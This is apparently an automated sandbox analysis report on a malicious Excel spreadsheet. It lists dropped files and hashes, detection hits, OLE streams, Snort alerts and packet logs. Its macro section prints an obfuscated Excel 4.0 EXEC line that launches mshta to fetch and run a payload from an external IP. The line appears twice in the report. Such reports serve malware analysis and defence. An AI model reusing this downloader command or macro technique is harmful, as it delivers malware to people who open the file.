                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\~DFB91905051C23B5E7.TMP

                                                                          Download File
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):28672
                                                                          Entropy (8bit):3.517419133438836
                                                                          Encrypted:false
                                                                          SSDEEP:768:dJlk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZEtmi:drk3hbdlylKsgqopeJBWhZFGkE+cMLxl
                                                                          MD5:90BBAB05A4FF4BB17E4A70F529FBF5F9
                                                                          SHA1:8A302D36A0851F604B81016EC67E4EA0556263E2
                                                                          SHA-256:B32CF0C2FD94AFE1AE7E0CA2C211F2363270784E2AB97E6BB0899749BE517DB5
                                                                          SHA-512:6C881DFF935679C17F13DC7A1D00047D6F4825F022E9EE4B9E850219376856E60028D00D2403F28454B6B56E8C1826FE928FD432FECEAE32830E296B0CA8A122
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1K4VR2PW3EG92IH5IDUU.temp

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8016
                                                                          Entropy (8bit):3.58389176043684
                                                                          Encrypted:false
                                                                          SSDEEP:96:chQCcMqlqvsqvJCwolz8hQCcMqlqvsEHyqvJCwor/zIyYuHyUVhAlUVrA2:ciUolz8iAHnor/zI9UVhnA2
                                                                          MD5:7058F03336E9B68499C25299B9225929
                                                                          SHA1:A76E437B7FE66D4CFBE22ADB8D87AC37A388296E
                                                                          SHA-256:E1AF258DD3672DF2FD3205711BA938DA9463B45F7A7DEC6E518F20731EA1F152
                                                                          SHA-512:619504984C735486B2A1EC437D484B956E0AB5670C1C7AF9FE8AE9FFE821929D05AB7C873051EEFD029FE5BAEFDF62D93295A37F97E534C7A2912745059F9464
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8016
                                                                          Entropy (8bit):3.58389176043684
                                                                          Encrypted:false
                                                                          SSDEEP:96:chQCcMqlqvsqvJCwolz8hQCcMqlqvsEHyqvJCwor/zIyYuHyUVhAlUVrA2:ciUolz8iAHnor/zI9UVhnA2
                                                                          MD5:7058F03336E9B68499C25299B9225929
                                                                          SHA1:A76E437B7FE66D4CFBE22ADB8D87AC37A388296E
                                                                          SHA-256:E1AF258DD3672DF2FD3205711BA938DA9463B45F7A7DEC6E518F20731EA1F152
                                                                          SHA-512:619504984C735486B2A1EC437D484B956E0AB5670C1C7AF9FE8AE9FFE821929D05AB7C873051EEFD029FE5BAEFDF62D93295A37F97E534C7A2912745059F9464
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                          C:\Users\user\Desktop\364453688149503140239183.xls

                                                                          Download File
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 20:28:58 2022, Last Saved Time/Date: Thu Jan 27 20:32:51 2022, Security: 0
                                                                          Category:dropped
                                                                          Size (bytes):47616
                                                                          Entropy (8bit):6.003066970272085
                                                                          Encrypted:false
                                                                          SSDEEP:768:HJlk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZEtm/piJaiyH5YnJe+eO+8WoFYpLy:Hrk3hbdlylKsgqopeJBWhZFGkE+cMLxl
                                                                          MD5:5BEF9644759EAA393FB6961698E69BE6
                                                                          SHA1:73C9BBD08D2CCCE85008673AC820D9E883908A08
                                                                          SHA-256:C195F5C47D4048BD8CB26596FE2DC884FF86E98E987CCF338D2A2035318A2231
                                                                          SHA-512:C83B14C2C14DB96551A4E377A1D3C00FB74F4B574C1F8109B78A37A8598F2510EA8BFAE4C469566A12935521FF367FFBBCB001E47AF531931D684FC14F5A4DD0
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\364453688149503140239183.xls, Author: John Lambert @JohnLaTwC
                                                                          • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\364453688149503140239183.xls, Author: Joe Security
                                                                          Reputation:unknown
                                                                          Preview:......................>.......................[...........................Z...........................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1.

                                                                          C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz (copy)

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):548864
                                                                          Entropy (8bit):6.9805281108446335
                                                                          Encrypted:false
                                                                          SSDEEP:12288:B2AavzUBPSczbeeTLjvGyMwWd3DYr6i64/:OUBPSczbeeTnv6ZDWA
                                                                          MD5:29389EBE59F75F143BC38D8932E06808
                                                                          SHA1:D5370F203FD1A34F4B4A5AAE58C2EEE0B39F864B
                                                                          SHA-256:AB46128507884F34AA46ADEDB1266B5D3DCD09EB39D657E3FAE7A97B870B8350
                                                                          SHA-512:CC9645B935093040758099B9B8E0C201B35D4CA2638E3BC0B71E03412F16259583E32E1559E123B64D9FB72C1A795CDE26022927756BCC4943718CC336316408
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                          Static File Info

                                                                          General

                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 20:28:58 2022, Last Saved Time/Date: Thu Jan 27 20:32:51 2022, Security: 0
                                                                          Entropy (8bit):5.979842615964849
                                                                          TrID:
                                                                          • Microsoft Excel sheet (30009/1) 78.94%
                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                          File name:364453688149503140239183.xls
                                                                          File size:47865
                                                                          MD5:4097bbda61bfb39067eab29fb342e34e
                                                                          SHA1:ca13a07a1eb59e7b30f217239a0db63235354c49
                                                                          SHA256:4d876f4afaf9df30d8b9ecaeddd86defa6dedd94dcaa933d67fe578b9cabdc18
                                                                          SHA512:c644a5280a8c0176b786c74333421b04df43ec3ff6c4a56e84ff194bf8f26a8a6ccb5256743ece86665119a7267232dd3086cc971d02b7ae760cdc842c416680
                                                                          SSDEEP:768:0Jlk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZEtm/piJaiyH5YnJe+eO+8WoFYpLd:0rk3hbdlylKsgqopeJBWhZFGkE+cMLx6
                                                                          File Content Preview:........................>.......................[...........................Z..................................................................................................................................................................................

                                                                          File Icon

                                                                          Icon Hash:e4eea286a4b4bcb4

                                                                          Static OLE Info

                                                                          General

                                                                          Document Type:OLE
                                                                          Number of OLE Files:1

                                                                          OLE File "364453688149503140239183.xls"

                                                                          Indicators
                                                                          Has Summary Info:True
                                                                          Application Name:Microsoft Excel
                                                                          Encrypted Document:False
                                                                          Contains Word Document Stream:False
                                                                          Contains Workbook/Book Stream:True
                                                                          Contains PowerPoint Document Stream:False
                                                                          Contains Visio Document Stream:False
                                                                          Contains ObjectPool Stream:
                                                                          Flash Objects Count:
                                                                          Contains VBA Macros:True
                                                                          Summary
                                                                          Code Page:1251
                                                                          Author:xXx
                                                                          Last Saved By:xXx
                                                                          Create Time:2022-01-27 20:28:58
                                                                          Last Saved Time:2022-01-27 20:32:51
                                                                          Creating Application:Microsoft Excel
                                                                          Security:0
                                                                          Document Summary
                                                                          Document Code Page:1251
                                                                          Thumbnail Scaling Desired:False
                                                                          Company:
                                                                          Contains Dirty Links:False
                                                                          Shared Document:False
                                                                          Changed Hyperlinks:False
                                                                          Application Version:1048576

                                                                          Streams

                                                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                          General
                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                          File Type:data
                                                                          Stream Size:4096
                                                                          Entropy:0.322065673806
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . G O D V I N . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                                                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f0 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 aa 00 00 00
                                                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                          General
                                                                          Stream Path:\x5SummaryInformation
                                                                          File Type:data
                                                                          Stream Size:4096
                                                                          Entropy:0.262591150018
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 37694
                                                                          General
                                                                          Stream Path:Workbook
                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                          Stream Size:37694
                                                                          Entropy:6.96044271744
                                                                          Base64 Encoded:True
                                                                          Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
                                                                          Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c1 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                          Macro 4.0 Code

                                                                          Name:GODVIN
                                                                          Type:3
                                                                          Final:False
                                                                          Visible:False
                                                                          Protected:False
                                                                                            GODVIN
                  3
                  False
                  0
                  False
                  post
                  3,9,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.5,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.7,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.13,9,=EXEC("CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l")14,9,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.16,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.18,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.20,9,=HALT()21,9,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.23,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.25,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.
                                                                          Name:GODVIN
                                                                          Type:3
                                                                          Final:False
                                                                          Visible:False
                                                                          Protected:False
                                                                                            GODVIN
                  3
                  False
                  0
                  False
                  pre
                  3,9,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.5,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.7,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.13,9,=EXEC("CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l")14,9,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.16,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.18,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.20,9,=HALT()21,9,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.23,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.25,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.

                                                                          Network Behavior

                                                                          Snort IDS Alerts

                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                          01/28/22-21:30:05.283601TCP2034631ET TROJAN Maldoc Activity (set)4916680192.168.2.2291.240.118.168

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 28, 2022 21:29:59.612735987 CET4916580192.168.2.2291.240.118.168
                                                                          Jan 28, 2022 21:29:59.673969984 CET804916591.240.118.168192.168.2.22
                                                                          Jan 28, 2022 21:29:59.674043894 CET4916580192.168.2.2291.240.118.168
                                                                          Jan 28, 2022 21:29:59.674928904 CET4916580192.168.2.2291.240.118.168
                                                                          Jan 28, 2022 21:29:59.736032009 CET804916591.240.118.168192.168.2.22
                                                                          Jan 28, 2022 21:29:59.736197948 CET804916591.240.118.168192.168.2.22
                                                                          Jan 28, 2022 21:29:59.736221075 CET804916591.240.118.168192.168.2.22
                                                                          Jan 28, 2022 21:29:59.736242056 CET804916591.240.118.168192.168.2.22
                                                                          Jan 28, 2022 21:29:59.736253977 CET4916580192.168.2.2291.240.118.168
                                                                          Jan 28, 2022 21:29:59.736264944 CET4916580192.168.2.2291.240.118.168
                                                                          Jan 28, 2022 21:29:59.736277103 CET4916580192.168.2.2291.240.118.168
                                                                          Jan 28, 2022 21:29:59.736295938 CET804916591.240.118.168192.168.2.22
                                                                          Jan 28, 2022 21:29:59.736316919 CET804916591.240.118.168192.168.2.22
                                                                          Jan 28, 2022 21:29:59.736329079 CET4916580192.168.2.2291.240.118.168
                                                                          Jan 28, 2022 21:29:59.736345053 CET4916580192.168.2.2291.240.118.168
                                                                          Jan 28, 2022 21:29:59.736351967 CET804916591.240.118.168192.168.2.22
                                                                          Jan 28, 2022 21:29:59.736371994 CET804916591.240.118.168192.168.2.22
                                                                          Jan 28, 2022 21:29:59.736381054 CET4916580192.168.2.2291.240.118.168
                                                                          Jan 28, 2022 21:29:59.736397028 CET4916580192.168.2.2291.240.118.168
                                                                          Jan 28, 2022 21:29:59.736409903 CET804916591.240.118.168192.168.2.22
                                                                          Jan 28, 2022 21:29:59.736426115 CET804916591.240.118.168192.168.2.22
                                                                          Jan 28, 2022 21:29:59.736440897 CET4916580192.168.2.2291.240.118.168
                                                                          Jan 28, 2022 21:29:59.736455917 CET4916580192.168.2.2291.240.118.168
                                                                          Jan 28, 2022 21:29:59.757611990 CET4916580192.168.2.2291.240.118.168
                                                                          Jan 28, 2022 21:30:05.222527027 CET4916680192.168.2.2291.240.118.168
                                                                          Jan 28, 2022 21:30:05.281189919 CET804916691.240.118.168192.168.2.22
                                                                          Jan 28, 2022 21:30:05.281279087 CET4916680192.168.2.2291.240.118.168
                                                                          Jan 28, 2022 21:30:05.283601046 CET4916680192.168.2.2291.240.118.168
                                                                          Jan 28, 2022 21:30:05.342128038 CET804916691.240.118.168192.168.2.22
                                                                          Jan 28, 2022 21:30:05.342173100 CET804916691.240.118.168192.168.2.22
                                                                          Jan 28, 2022 21:30:05.342190027 CET804916691.240.118.168192.168.2.22
                                                                          Jan 28, 2022 21:30:05.342240095 CET4916680192.168.2.2291.240.118.168
                                                                          Jan 28, 2022 21:30:05.756164074 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.070408106 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.070489883 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.070625067 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.383723974 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391297102 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391338110 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391362906 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391386986 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391411066 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391434908 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391452074 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.391458988 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391485929 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391510963 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391532898 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.393876076 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.393891096 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.393893957 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.587346077 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.704612017 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.704646111 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.704668045 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.704689980 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.704741955 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.706851959 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.706880093 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.706901073 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.706902027 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.706923962 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.706932068 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.706947088 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.706969023 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.706979990 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.706993103 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.707015991 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.707025051 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.707039118 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.707062006 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.707071066 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.707083941 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.707107067 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.707114935 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.707134962 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.707158089 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.707169056 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.900599003 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.900636911 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.900710106 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:07.017822981 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.017885923 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.017910004 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.017930031 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.017951012 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.017971039 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.018004894 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:07.018043041 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:07.020210981 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.020242929 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.020267963 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.020289898 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.020292997 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:07.020313025 CET8049167139.59.58.214192.168.2.22
